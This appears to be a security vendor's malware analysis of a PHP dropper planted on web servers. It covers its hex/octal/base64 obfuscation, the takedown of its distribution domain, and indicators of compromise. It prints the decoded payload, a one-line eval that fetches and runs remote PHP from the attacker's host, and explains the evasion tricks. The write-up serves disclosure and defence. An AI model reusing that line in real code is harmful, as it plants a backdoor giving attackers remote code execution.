This PHP snippet is a lightweight downloader/executor (often called a "dropper"). It uses multi-layered encoding (Hex, Octal, and Base64) to hide its true intent: fetching and executing remote code from a Command and Control (C2) server. By suppressing error reporting, it ensures that even if the remote server is down, the compromised web server won't throw a visible error that might alert an administrator.

Deconstructing the file

Step 1: Evasion and Silence

The code begins with a common evasion tactic:

error_reporting(E_ALL^E_NOTICE^E_WARNING);

This tells PHP to ignore notices and warnings. If the script fails to reach its home server, it won't log an "Insecure Connection" or "File Not Found" warning, helping it stay "under the radar" in system logs.

‍

Step 2: Layered Obfuscation

The variable $a contains a long string of mixed Hex (\x50) and Octal (\104) characters. When these are converted to plain text, they reveal a Base64 encoded string.

The obfuscation chain looks like this:

1. Hex/Octal String → Decodes to → Base64 String
2. Base64 String → Decodes to → Active PHP Payload

‍

Step 3: The De-obfuscated Payload

Once we decode the Base64 string inside $a, the true malicious intent is revealed:

<?=eval("?>".file_get_contents("https://jwblog[.]vjkcity[.]com/1202.txt")); __halt_compiler();?>

‍

What this payload does:

• file_get_contents: It reaches out to an external URL (jwblog[.]vjkcity[.]com/1202.txt).
• eval("?>". ...): It takes whatever text is inside that .txt file and executes it as PHP code immediately. This allows the attacker to change the malware (e.g., swapping a credit card scraper for a ransomware locker) without ever touching the compromised server again.
• __halt_compiler(): This is often used to prevent any trailing junk data in the file from being parsed, ensuring the script exits cleanly.

‍

Stopping the spread

At Monarx, besides remediating and identifying malware; we work towards the common good and when possible file requests with Registrars, Hosting Providers and transit providers such as Cloudflare, so these malicious domains serving malware can be taken offline. 

‍

During the investigation we found the following variations:

‍jwblog[.]vjkcity[.]com/1202.txt
jwblog[.]vjkcity[.]com/1121.txt
jwblog[.]vjkcity[.]com/wp-toc.txt

‍

Checking the hosting

A simple DNS query revealed this website was loading from Cloudflare:

jwblog.vjkcity.com. 122 IN A 172.67.158.51
jwblog.vjkcity.com. 122 IN A 104.21.90.166

And they even had set up some protection as a simple cURL from our Sandbox received a HTTP 403 Forbidden response code:

HTTP/1.1 403 Forbidden
Date: Tue, 10 Feb 2026 00:15:19 GMT
Content-Type: text/html
Connection: keep-alive
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Server: cloudflare
X-Powered-By: ASP.NET
cf-cache-status: DYNAMIC
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=nM2%2FTkgMMscDk1ZR08MaStaqBOmMycNL2QI1emhW6JCsDiBErCtFUys8nwBvXEEgaGdoKURPIwl6NAPeJwxgR1kfxiIxUglGbNXFfaaix4y9Qw%3D%3D"}]}
CF-RAY: 9cb769531e8093d5-DFW
alt-svc: h3=":443"; ma=86400

We proceeded to file an Abuse claim for Malware distribution against them with Cloudflare and provided all the details so they could review. 

‍

Escalating to the Registrar

The next step was to check who was the registrar for the domain, for this we checked the WHOIS record for the domain to find their registrar was openprovider.com:

  Domain Name: VJKCITY.COM
   Registry Domain ID: 2105659736_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.registrar.eu
   Registrar URL: http://www.openprovider.com
   Updated Date: 2025-12-18T06:54:46Z
   Creation Date: 2017-03-17T06:58:55Z
   Registry Expiry Date: 2027-03-17T06:58:55Z
   Registrar: Hosting Concepts B.V. d/b/a Registrar.eu
   Registrar IANA ID: 1647
   Registrar Abuse Contact Email: abuse@registrar.eu
   Registrar Abuse Contact Phone: +31.104482297
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: NAYA.NS.CLOUDFLARE.COM
   Name Server: NIKON.NS.CLOUDFLARE.COM

‍

We followed their guidelines for reporting malware, and provided all the necessary information and they parked the domain and forwarded the complaint against the domain owner. A few hours later we received confirmation that the malicious content was removed. 

The site was confirmed to be offline and no longer distributing malware, which effectively halted the further spread of the infection 🎉.

‍

Indicators of Compromise (IoCs)

Professionals should look for the following markers in web logs and file integrity monitoring systems:

Network Indicators

• Domain: jwblog[.]vjkcity[.]com (C2 Distribution Server)
• URLs: 
  
  1. jwblog[.]vjkcity[.]com/1202.txt (Remote Payload Location #1)
  2. jwblog[.]vjkcity[.]com/1121.txt (Remote Payload Location #2)
  3. jwblog[.]vjkcity[.]com/wp-toc.txt (Remote Payload Location #3)
• IPs uploading this malware:
  
  1. 140[.]83[.]84[.]85
  2. 79[.]127[.]200[.]148

File paths & SHA256 Signatures

• File path: /wp-moc.php
• SHA256 Signatures of the variations observed:
  
  • d9abdc7e6eaaee5bead9c4638555681e4168d337687f3b97f9e5b1df06500d2
  • 8d73e1ee08b734bced26ca7ef799314f369026df5a32bd1236f3763f0e3c9372
  • 2cf0a9772c5f05a9e43758ff6e354d26e78e89ba8b7d1dd34506680284f9f546

Note: The specific IP addresses & domains provided above are the ones observed during the investigation. Specific, actionable IPs & domains should be validated with your threat intelligence feeds.

‍